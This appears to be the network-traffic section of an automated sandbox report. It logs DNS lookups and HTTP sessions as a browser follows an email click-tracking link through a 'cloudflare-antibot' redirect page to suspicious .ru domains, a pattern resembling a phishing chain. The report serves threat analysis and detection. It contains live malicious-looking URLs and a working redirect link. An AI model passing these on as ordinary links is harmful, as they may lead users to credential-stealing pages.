                                                                                                        Oct 4, 2024 15:11:35.818973064 CEST192.168.2.161.1.1.10x5d69Standard query (0)9wetjda.niavereinho.ru65IN (0x0001)false
                                                                                                        Oct 4, 2024 15:11:38.157902002 CEST192.168.2.161.1.1.10xd214Standard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                                                                                        Oct 4, 2024 15:11:38.158060074 CEST192.168.2.161.1.1.10x9f1dStandard query (0)code.jquery.com65IN (0x0001)false
                                                                                                        Oct 4, 2024 15:11:38.158725023 CEST192.168.2.161.1.1.10x11bcStandard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                        Oct 4, 2024 15:11:38.158860922 CEST192.168.2.161.1.1.10xf5f2Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                        Oct 4, 2024 15:11:38.159116030 CEST192.168.2.161.1.1.10x6f5dStandard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                        Oct 4, 2024 15:11:38.159238100 CEST192.168.2.161.1.1.10xd2bfStandard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                                        Oct 4, 2024 15:11:38.870659113 CEST192.168.2.161.1.1.10x6f94Standard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                        Oct 4, 2024 15:11:38.870852947 CEST192.168.2.161.1.1.10xf925Standard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                                        Oct 4, 2024 15:11:38.930496931 CEST192.168.2.161.1.1.10xefeaStandard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                                                                                        Oct 4, 2024 15:11:38.930651903 CEST192.168.2.161.1.1.10x1b0cStandard query (0)code.jquery.com65IN (0x0001)false
                                                                                                        Oct 4, 2024 15:11:39.560003042 CEST192.168.2.161.1.1.10x7119Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                        Oct 4, 2024 15:11:39.560148001 CEST192.168.2.161.1.1.10x3395Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                        Oct 4, 2024 15:11:41.238523006 CEST192.168.2.161.1.1.10xe964Standard query (0)a.nel.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                        Oct 4, 2024 15:11:41.238686085 CEST192.168.2.161.1.1.10xa047Standard query (0)a.nel.cloudflare.com65IN (0x0001)false
                                                                                                        Oct 4, 2024 15:11:48.825118065 CEST192.168.2.161.1.1.10xdd70Standard query (0)wgqe7vkgoahs84cyd22bjy2ejwoyyvjyphrjtoyny5kmdunzf1munrjcw1b.transenil.ruA (IP address)IN (0x0001)false
                                                                                                        Oct 4, 2024 15:11:48.825253963 CEST192.168.2.161.1.1.10x3f90Standard query (0)wgqe7vkgoahs84cyd22bjy2ejwoyyvjyphrjtoyny5kmdunzf1munrjcw1b.transenil.ru65IN (0x0001)false
                                                                                                        Oct 4, 2024 15:11:51.006831884 CEST192.168.2.161.1.1.10x2d11Standard query (0)noon.comA (IP address)IN (0x0001)false
                                                                                                        Oct 4, 2024 15:11:51.007004023 CEST192.168.2.161.1.1.10x56daStandard query (0)noon.com65IN (0x0001)false
                                                                                                        Oct 4, 2024 15:11:51.029417992 CEST192.168.2.161.1.1.10x2851Standard query (0)wgqe7vkgoahs84cyd22bjy2ejwoyyvjyphrjtoyny5kmdunzf1munrjcw1b.transenil.ruA (IP address)IN (0x0001)false
                                                                                                        Oct 4, 2024 15:11:51.031964064 CEST192.168.2.161.1.1.10xb10dStandard query (0)wgqe7vkgoahs84cyd22bjy2ejwoyyvjyphrjtoyny5kmdunzf1munrjcw1b.transenil.ru65IN (0x0001)false
                                                                                                        Oct 4, 2024 15:11:51.732795000 CEST192.168.2.161.1.1.10x8297Standard query (0)www.noon.comA (IP address)IN (0x0001)false
                                                                                                        Oct 4, 2024 15:11:51.732969046 CEST192.168.2.161.1.1.10x1409Standard query (0)www.noon.com65IN (0x0001)false
                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                        Oct 4, 2024 15:11:16.061959982 CEST1.1.1.1192.168.2.160xf8aeNo error (0)dtnyxe.member365.comm365-prod-eb-aurora-eb-env.2zkz76p2cg.us-west-2.elasticbeanstalk.comCNAME (Canonical name)IN (0x0001)false
                                                                                                        Oct 4, 2024 15:11:16.087528944 CEST1.1.1.1192.168.2.160x32a7No error (0)dtnyxe.member365.comm365-prod-eb-aurora-eb-env.2zkz76p2cg.us-west-2.elasticbeanstalk.comCNAME (Canonical name)IN (0x0001)false
                                                                                                        Oct 4, 2024 15:11:16.087528944 CEST1.1.1.1192.168.2.160x32a7No error (0)m365-prod-eb-aurora-eb-env.2zkz76p2cg.us-west-2.elasticbeanstalk.com44.239.42.53A (IP address)IN (0x0001)false
                                                                                                        Oct 4, 2024 15:11:16.087528944 CEST1.1.1.1192.168.2.160x32a7No error (0)m365-prod-eb-aurora-eb-env.2zkz76p2cg.us-west-2.elasticbeanstalk.com35.82.232.96A (IP address)IN (0x0001)false
                                                                                                        Oct 4, 2024 15:11:16.087528944 CEST1.1.1.1192.168.2.160x32a7No error (0)m365-prod-eb-aurora-eb-env.2zkz76p2cg.us-west-2.elasticbeanstalk.com54.185.126.212A (IP address)IN (0x0001)false
                                                                                                        Oct 4, 2024 15:11:17.572547913 CEST1.1.1.1192.168.2.160x2125No error (0)hollandco.athrikasih.com103.159.65.146A (IP address)IN (0x0001)false
                                                                                                        Oct 4, 2024 15:11:20.850347042 CEST1.1.1.1192.168.2.160x3c3bNo error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                                                        Oct 4, 2024 15:11:20.850347042 CEST1.1.1.1192.168.2.160x3c3bNo error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                                                        Oct 4, 2024 15:11:20.850364923 CEST1.1.1.1192.168.2.160x9d62No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                        Oct 4, 2024 15:11:20.850378990 CEST1.1.1.1192.168.2.160x222aNo error (0)www.google.com142.250.186.164A (IP address)IN (0x0001)false
                                                                                                        Oct 4, 2024 15:11:20.850398064 CEST1.1.1.1192.168.2.160xf94dNo error (0)www.google.com65IN (0x0001)false
                                                                                                        Oct 4, 2024 15:11:22.169687986 CEST1.1.1.1192.168.2.160xb4b4No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                        Oct 4, 2024 15:11:22.170013905 CEST1.1.1.1192.168.2.160x30bbNo error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                                                        Oct 4, 2024 15:11:22.170013905 CEST1.1.1.1192.168.2.160x30bbNo error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                                                        Oct 4, 2024 15:11:22.187756062 CEST1.1.1.1192.168.2.160xf955No error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                                                        Oct 4, 2024 15:11:22.187756062 CEST1.1.1.1192.168.2.160xf955No error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                                                        Oct 4, 2024 15:11:22.188976049 CEST1.1.1.1192.168.2.160xf948No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                        Oct 4, 2024 15:11:23.844868898 CEST1.1.1.1192.168.2.160x3059No error (0)x1.i.lencr.orgcrl.root-x1.letsencrypt.org.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                        Oct 4, 2024 15:11:36.085695982 CEST1.1.1.1192.168.2.160xa8fNo error (0)9wetjda.niavereinho.ru188.114.97.3A (IP address)IN (0x0001)false
                                                                                                        Oct 4, 2024 15:11:36.085695982 CEST1.1.1.1192.168.2.160xa8fNo error (0)9wetjda.niavereinho.ru188.114.96.3A (IP address)IN (0x0001)false
                                                                                                        Oct 4, 2024 15:11:36.130331039 CEST1.1.1.1192.168.2.160x5d69No error (0)9wetjda.niavereinho.ru65IN (0x0001)false
                                                                                                        Oct 4, 2024 15:11:37.477257013 CEST1.1.1.1192.168.2.160x5650No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                        Oct 4, 2024 15:11:37.477257013 CEST1.1.1.1192.168.2.160x5650No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                        Oct 4, 2024 15:11:38.165236950 CEST1.1.1.1192.168.2.160xd214No error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                                                                                        Oct 4, 2024 15:11:38.165236950 CEST1.1.1.1192.168.2.160xd214No error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                                                                                        Oct 4, 2024 15:11:38.165236950 CEST1.1.1.1192.168.2.160xd214No error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                                                                                        Oct 4, 2024 15:11:38.165236950 CEST1.1.1.1192.168.2.160xd214No error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                                                                                        Oct 4, 2024 15:11:38.165790081 CEST1.1.1.1192.168.2.160xf5f2No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                        Oct 4, 2024 15:11:38.165851116 CEST1.1.1.1192.168.2.160x6f5dNo error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                                                                        Oct 4, 2024 15:11:38.165851116 CEST1.1.1.1192.168.2.160x6f5dNo error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                                                                        Oct 4, 2024 15:11:38.166359901 CEST1.1.1.1192.168.2.160xd2bfNo error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                                        Oct 4, 2024 15:11:38.166619062 CEST1.1.1.1192.168.2.160x11bcNo error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                                                        Oct 4, 2024 15:11:38.166619062 CEST1.1.1.1192.168.2.160x11bcNo error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                                                        Oct 4, 2024 15:11:38.879091024 CEST1.1.1.1192.168.2.160xf925No error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                                        Oct 4, 2024 15:11:38.879110098 CEST1.1.1.1192.168.2.160x6f94No error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                                                                        Oct 4, 2024 15:11:38.879110098 CEST1.1.1.1192.168.2.160x6f94No error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                                                                        Oct 4, 2024 15:11:38.940103054 CEST1.1.1.1192.168.2.160xefeaNo error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                                                                                        Oct 4, 2024 15:11:38.940103054 CEST1.1.1.1192.168.2.160xefeaNo error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                                                                                        Oct 4, 2024 15:11:38.940103054 CEST1.1.1.1192.168.2.160xefeaNo error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                                                                                        Oct 4, 2024 15:11:38.940103054 CEST1.1.1.1192.168.2.160xefeaNo error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                                                                                        Oct 4, 2024 15:11:39.566920996 CEST1.1.1.1192.168.2.160x7119No error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                                                        Oct 4, 2024 15:11:39.566920996 CEST1.1.1.1192.168.2.160x7119No error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                                                        Oct 4, 2024 15:11:39.567429066 CEST1.1.1.1192.168.2.160x3395No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                        Oct 4, 2024 15:11:41.245486975 CEST1.1.1.1192.168.2.160xe964No error (0)a.nel.cloudflare.com35.190.80.1A (IP address)IN (0x0001)false
                                                                                                        Oct 4, 2024 15:11:48.951996088 CEST1.1.1.1192.168.2.160x3f90No error (0)wgqe7vkgoahs84cyd22bjy2ejwoyyvjyphrjtoyny5kmdunzf1munrjcw1b.transenil.ru65IN (0x0001)false
                                                                                                        Oct 4, 2024 15:11:49.017318010 CEST1.1.1.1192.168.2.160xdd70No error (0)wgqe7vkgoahs84cyd22bjy2ejwoyyvjyphrjtoyny5kmdunzf1munrjcw1b.transenil.ru188.114.97.3A (IP address)IN (0x0001)false
                                                                                                        Oct 4, 2024 15:11:49.017318010 CEST1.1.1.1192.168.2.160xdd70No error (0)wgqe7vkgoahs84cyd22bjy2ejwoyyvjyphrjtoyny5kmdunzf1munrjcw1b.transenil.ru188.114.96.3A (IP address)IN (0x0001)false
                                                                                                        Oct 4, 2024 15:11:51.024204016 CEST1.1.1.1192.168.2.160x2d11No error (0)noon.com104.17.202.204A (IP address)IN (0x0001)false
                                                                                                        Oct 4, 2024 15:11:51.024204016 CEST1.1.1.1192.168.2.160x2d11No error (0)noon.com104.17.203.204A (IP address)IN (0x0001)false
                                                                                                        Oct 4, 2024 15:11:51.024204016 CEST1.1.1.1192.168.2.160x2d11No error (0)noon.com104.17.204.204A (IP address)IN (0x0001)false
                                                                                                        Oct 4, 2024 15:11:51.024204016 CEST1.1.1.1192.168.2.160x2d11No error (0)noon.com104.17.201.204A (IP address)IN (0x0001)false
                                                                                                        Oct 4, 2024 15:11:51.024204016 CEST1.1.1.1192.168.2.160x2d11No error (0)noon.com104.17.200.204A (IP address)IN (0x0001)false
                                                                                                        Oct 4, 2024 15:11:51.024724960 CEST1.1.1.1192.168.2.160x56daNo error (0)noon.com65IN (0x0001)false
                                                                                                        Oct 4, 2024 15:11:51.121246099 CEST1.1.1.1192.168.2.160x2851No error (0)wgqe7vkgoahs84cyd22bjy2ejwoyyvjyphrjtoyny5kmdunzf1munrjcw1b.transenil.ru188.114.96.3A (IP address)IN (0x0001)false
                                                                                                        Oct 4, 2024 15:11:51.121246099 CEST1.1.1.1192.168.2.160x2851No error (0)wgqe7vkgoahs84cyd22bjy2ejwoyyvjyphrjtoyny5kmdunzf1munrjcw1b.transenil.ru188.114.97.3A (IP address)IN (0x0001)false
                                                                                                        Oct 4, 2024 15:11:51.124228001 CEST1.1.1.1192.168.2.160xb10dNo error (0)wgqe7vkgoahs84cyd22bjy2ejwoyyvjyphrjtoyny5kmdunzf1munrjcw1b.transenil.ru65IN (0x0001)false
                                                                                                        Oct 4, 2024 15:11:51.742352962 CEST1.1.1.1192.168.2.160x1409No error (0)www.noon.comlb-akamai.noon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                        Oct 4, 2024 15:11:51.742352962 CEST1.1.1.1192.168.2.160x1409No error (0)lb-akamai.noon.comwildcard.noon.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                        Oct 4, 2024 15:11:51.757889032 CEST1.1.1.1192.168.2.160x8297No error (0)www.noon.comlb-akamai.noon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                        Oct 4, 2024 15:11:51.757889032 CEST1.1.1.1192.168.2.160x8297No error (0)lb-akamai.noon.comwildcard.noon.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                        • dtnyxe.member365.com
                                                                                                        • slscr.update.microsoft.com
                                                                                                        • hollandco.athrikasih.com
                                                                                                        • https:
                                                                                                          • challenges.cloudflare.com
                                                                                                          • 9wetjda.niavereinho.ru
                                                                                                          • code.jquery.com
                                                                                                          • cdnjs.cloudflare.com
                                                                                                          • wgqe7vkgoahs84cyd22bjy2ejwoyyvjyphrjtoyny5kmdunzf1munrjcw1b.transenil.ru
                                                                                                          • noon.com
                                                                                                        • armmf.adobe.com
                                                                                                        • a.nel.cloudflare.com
                                                                                                        • login.live.com
                                                                                                        • www.bing.com
                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        0192.168.2.164970944.239.42.534431904C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-10-04 13:11:16 UTC795OUTGET /ecommunication/api/click/7Lb0GMXJRUy9jjYQJ2oXiQ/l8Qf-Ol5oF6En4qK8pFq1A?r=https%3A%2F%2FHollandco.athrikasih.com%2Fcloudflare-antibot HTTP/1.1
                                                                                                        Host: dtnyxe.member365.com
                                                                                                        Connection: keep-alive
                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                        Upgrade-Insecure-Requests: 1
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                        Sec-Fetch-Site: none
                                                                                                        Sec-Fetch-Mode: navigate
                                                                                                        Sec-Fetch-User: ?1
                                                                                                        Sec-Fetch-Dest: document
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        2024-10-04 13:11:17 UTC721INHTTP/1.1 307 Temporary Redirect
                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                        Date: Fri, 04 Oct 2024 13:11:17 GMT
                                                                                                        Location: https://Hollandco.athrikasih.com/cloudflare-antibot
                                                                                                        Server: Apache
                                                                                                        Set-Cookie: ci_session=a%3A4%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%223dad3cab2c80d4d121fde9ebfa120e12%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A10%3A%2210.0.11.10%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A111%3A%22Mozilla%2F5.0+%28Windows+NT+10.0%3B+Win64%3B+x64%29+AppleWebKit%2F537.36+%28KHTML%2C+like+Gecko%29+Chrome%2F117.0.0.0+Safari%2F537.36%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1728047477%3B%7Da5ad8afcb8f2e196ecaee6354a0703a4; expires=1728054677;path=/; domain=; samesite=none; secure
                                                                                                        Content-Length: 0
                                                                                                        Connection: Close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        1192.168.2.164971120.12.23.50443
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-10-04 13:11:17 UTC306OUTGET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=CuYWk7mCX1vLgvr&MD=ATD2E8nm HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Accept: */*
                                                                                                        User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                                        Host: slscr.update.microsoft.com
                                                                                                        2024-10-04 13:11:17 UTC560INHTTP/1.1 200 OK
                                                                                                        Cache-Control: no-cache
                                                                                                        Pragma: no-cache
                                                                                                        Content-Type: application/octet-stream
                                                                                                        Expires: -1
                                                                                                        Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                        ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880"
                                                                                                        MS-CorrelationId: 71eebf02-5144-4407-944e-53bbcb5768e8
                                                                                                        MS-RequestId: bc800661-b919-44ca-8448-824b22c2381c
                                                                                                        MS-CV: jg884bZIDkKKfj+O.0
                                                                                                        X-Microsoft-SLSClientCache: 2880
                                                                                                        Content-Disposition: attachment; filename=environment.cab
                                                                                                        X-Content-Type-Options: nosniff
                                                                                                        Date: Fri, 04 Oct 2024 13:11:16 GMT
                                                                                                        Connection: close
                                                                                                        Content-Length: 24490
                                                                                                        2024-10-04 13:11:17 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58
                                                                                                        Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
                                                                                                        2024-10-04 13:11:17 UTC8666INData Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31
                                                                                                        Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        2192.168.2.1649713103.159.65.1464431904C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-10-04 13:11:18 UTC685OUTGET /cloudflare-antibot HTTP/1.1
                                                                                                        Host: hollandco.athrikasih.com
                                                                                                        Connection: keep-alive
                                                                                                        Upgrade-Insecure-Requests: 1
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                        Sec-Fetch-Site: none
                                                                                                        Sec-Fetch-Mode: navigate
                                                                                                        Sec-Fetch-User: ?1
                                                                                                        Sec-Fetch-Dest: document
                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        2024-10-04 13:11:19 UTC397INHTTP/1.1 301 Moved Permanently
                                                                                                        Connection: close
                                                                                                        content-type: text/html
                                                                                                        content-length: 795
                                                                                                        date: Fri, 04 Oct 2024 13:11:18 GMT
                                                                                                        server: LiteSpeed
                                                                                                        location: https://hollandco.athrikasih.com/cloudflare-antibot/
                                                                                                        alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                                        2024-10-04 13:11:19 UTC795INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e
                                                                                                        Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!importan


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        3192.168.2.1649717103.159.65.1464431904C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-10-04 13:11:20 UTC686OUTGET /cloudflare-antibot/ HTTP/1.1
                                                                                                        Host: hollandco.athrikasih.com
                                                                                                        Connection: keep-alive
                                                                                                        Upgrade-Insecure-Requests: 1
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                        Sec-Fetch-Site: none
                                                                                                        Sec-Fetch-Mode: navigate
                                                                                                        Sec-Fetch-User: ?1
                                                                                                        Sec-Fetch-Dest: document
                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        2024-10-04 13:11:20 UTC360INHTTP/1.1 200 OK
                                                                                                        Connection: close
                                                                                                        x-powered-by: PHP/7.4.33
                                                                                                        content-type: text/html; charset=UTF-8
                                                                                                        content-length: 1985
                                                                                                        date: Fri, 04 Oct 2024 13:11:20 GMT
                                                                                                        server: LiteSpeed
                                                                                                        alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                                        2024-10-04 13:11:20 UTC1008INData Raw: 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 65 65 64 62 61 63 6b 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 74 75 72 6e 73 74 69 6c 65 2f 76 30 2f 61 70 69 2e 6a 73 22 20 61 73 79 6e 63 20 64 65 66 65 72 3e
                                                                                                        Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Feedback</title> <script src="https://challenges.cloudflare.com/turnstile/v0/api.js" async defer>
